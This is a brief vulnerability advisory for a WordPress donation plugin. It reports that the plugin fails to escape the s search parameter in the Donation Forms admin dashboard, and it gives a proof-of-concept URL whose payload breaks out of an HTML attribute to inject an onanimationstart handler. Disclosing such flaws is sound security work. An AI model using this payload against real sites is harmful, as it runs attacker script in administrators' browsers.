The plugin does not escape the s parameter before outputting it back in an attribute in the Donation Forms dashboard, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/edit.php?s="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//&post;_status=all&post;_type=give_forms&action;=-1&start-date;&end-date;&give-forms-goal-filter;=any_goal_status&paged;=1&action2;=-1